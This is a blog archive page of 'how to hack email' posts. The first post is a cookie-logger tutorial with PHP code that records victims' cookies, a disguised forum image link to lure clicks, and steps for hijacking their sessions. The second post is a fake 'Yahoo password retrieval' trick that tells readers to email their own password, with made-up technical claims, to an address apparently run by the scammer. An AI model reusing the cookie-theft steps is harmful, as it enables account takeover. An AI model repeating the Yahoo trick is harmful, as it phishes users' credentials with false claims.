Showing posts with label How to hack email. Show all posts
Showing posts with label How to hack email. Show all posts
Wednesday, April 6, 2011
Monday, February 21, 2011
How to hack into email accounts (Cookie Logger)?
Today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger
Steps:
1: First you have to create a file which can capture a person's cookie.So follow the following process.
Download this ZIP
2: Now you have to change "http://pctipsbyanu.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif
3: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
4:Create a new Notepad File and Save it as logfile.txt
Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
www.ofees.net
www.t35.com
www.ripway.com
5:Go to the victim forum and insert this code in the signature or a post :
[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif
6: So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
7: And something like this will be stored in your "logfile.txt"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
8: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Now for this you will need a firefox addon named "Add and edit cookies"
Thanks....
Monday, July 5, 2010
Wanna hack Yahoo Password...
Hi, It is possible and it is easyI have tried the method a least a dozen times and it has worked on all but 2 occasions, I don't know the reason why it failed a couple of times, but on every other occasion it has got me the password for the requested email address.
This is how it is done:
STEP 1- Log in to your own yahoo account.
Note: Your account must be at least 30 days old for this to work.
STEP 2- Once you have logged into your own account, compose/write an e-mail
To: yserverindia@yahoo.co.in
This is a mailing address to the Yahoo Staff. The automated server will send you the password that you have 'forgotten', after receiving the information you send them.
STEP 3- In the subject line type exactly: password retrieve.
STEP 4- On the first line of your mail write the email address of the person you are hacking.
STEP 5- On the second line type in the e-mail address you are using.
STEP 6- On the third line type in the password to YOUR email address (your OWN password). The computer needs your password so it can send a java-script from your account in the Yahoo Server to extract the other email addresses password. In other word the system automatically checks your password to confirm the integrity of your status.
Remember you are sending your password to a machine not a man. The process will be done automatically by the user administration server.
NOTE: You can use your other email account other than yahoo.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin/$et76431&pwrsa so
NOTE: You can use your other email account other than yahoo.
STEP 7- The final step before sending the mail is, type on the fourth line the following code exactly: cgi-bin/$et76431&pwrsa so
for example if your yahoo id is : tiger_100@yahoo.com and your password is: tiger and the email address you want to hack is: test@yahoo.com then compose the mail as below:
To: yserverindia@yahoo.co.in
bcc: cc:
Subject: password retrieve
test@yahoo.com
tiger_100@yahoo.com
tiger
cgi-bin/$et76431&pwrsa
The password will be sent to your inbox in a mail called "System Reg Message" from "System".
Usually within 1 hour. When my friend showed me how to do this I thought it was too good a trick to keep to myself!
Just try and enjoy!
Subscribe to:
Posts (Atom)
Wednesday, April 06, 2011
Anu





